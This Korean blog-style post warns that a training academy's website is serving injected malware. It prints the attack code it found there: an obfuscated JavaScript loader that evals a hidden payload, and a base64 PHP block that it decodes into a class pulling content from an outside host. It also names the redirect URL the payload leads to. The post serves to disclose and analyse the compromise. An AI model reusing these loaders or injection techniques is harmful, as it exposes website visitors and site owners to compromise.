중앙정보처리학원 → http://it.choongang.co.kr 악성 스크립트 유포중!!

원본 위치 : http://it.choongang.co.kr/curri/curri_week.asp?m=2

스크립트내에 두가지 스크립트가 존재한다 !

</script>

</body>

</html><textarea id="uxi" style="display:none;">717a766078707b613b62677c[생략]5b372e</textarea><script>sgon="var wkoder = 'Stri'+'ng.f'+'rom'+'Char'+'Code'; wkoder2 = '78'; function fs(){bah=eval('Ma'+'t'+'h.P'+'I');mg=eval('p'+'arseI'+'nt');qcsjh='le'+'ng'+'th';mjeal=mg(~((bah&bah)|(~bah&bah)&(bah&~bah)|(~bah&~bah)));ybr=mg(((mjeal&mjeal)|(~mjeal&mjeal)&(mjeal&~mjeal)|(~mjeal&~mjeal))&1);sehihn=ybr<<ybr;flh=mjeal;flh=mjeal;lma='';teyrh=eval(wkoder);egxf=eval;for(uxsasv=mjeal;uxsasv<sgon[qcsjh];uxsasv-=-ybr)flh+=eval('sgon.ch'+'arCod'+'eA'+'t(uxsasv)');flh%=[생략](1<<6)));for(uxsasv=mjeal;uxsasv<document.getElementById('uxi').value[qcsjh];uxsasv+=sehihn)lma+=teyrh(mg(mjeal+unescape('%'+wkoder2)+document.getElementById('uxi').value.charAt(uxsasv)+document.getElementById('uxi').value.charAt(uxsasv+mg(ybr)))^flh);try{egxf(lma);}catch(e){try{eval(lma);}catch(e) {window.location='/';}}}try{eval('fs();')}catch(e) {alert('e'+'rr');}";eval(sgon);</script>

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0K

JGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczs

NCmNsYXNzIEdldEpbmtzDQp7DQoJdmFyICRob3N0ID0gImVzbGkudHciOw0KC

XZhciAk[생략]wYWdlID0gZXhwbG9kZSgiXHJcblxyXG4iLCAkYnV

mZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ=='));?>

먼저 BASE64 코드로 만들어진 스크립트를 디코딩시 !

PHP 쉘로 변환이 됩니다!

자세히는 모르지만 PHP 쉘로 Backdoor의 역활을 하는거 같습니다!

error_reporting(0);

$links = new GetLinks();

echo $links->Links;

class GetLinks

{

var $host = "esli.tw";

var $path = "/link.php?site=";

var $site = "";

var $user_agent = "";

var $Links = "";

var $_socket_timeout    = 12;

var $_cashe_life_time    = 3600;

var $_cashe_file    = "cashe.txt";

function GetLinks()

{

if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

$this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];

$this->user_agent = $_SERVER['HTTP_USER_AGENT'];

$this->Links = $this->fetch_remote_file();

if ($handle = fopen($this->_cashe_file, 'w')) {

fwrite($handle, $this->Links);

}

                        [생략]

fclose($handle);

}

else {

$this->Links = file_get_contents($this->_cashe_file);

}

}

function fetch_remote_file()

{

 $buff = '';

    $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);

    if (!$fp) {

    } else {

        $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";

        $out .= "Host: {$this->host}\r\n";

        $out .= "Connection: Close\r\n\r\n";

    

        fwrite($fp, $out);

        while (!feof($fp)) {

            $buff .= fgets($fp, 128);

        }

        fclose($fp);

  $page = explode("\r\n\r\n", $buff);

  return $page[1];

    }

}

}

위에있는 첫번째 코드는 디코딩시 !

http://today-newday.cn/in.cgi?6&amp;parameter=newday

=========================

Server IP(s):

0.0.0.0

=========================

연결을 하지만 현재는 페이지가 죽어 있는 상태입니다!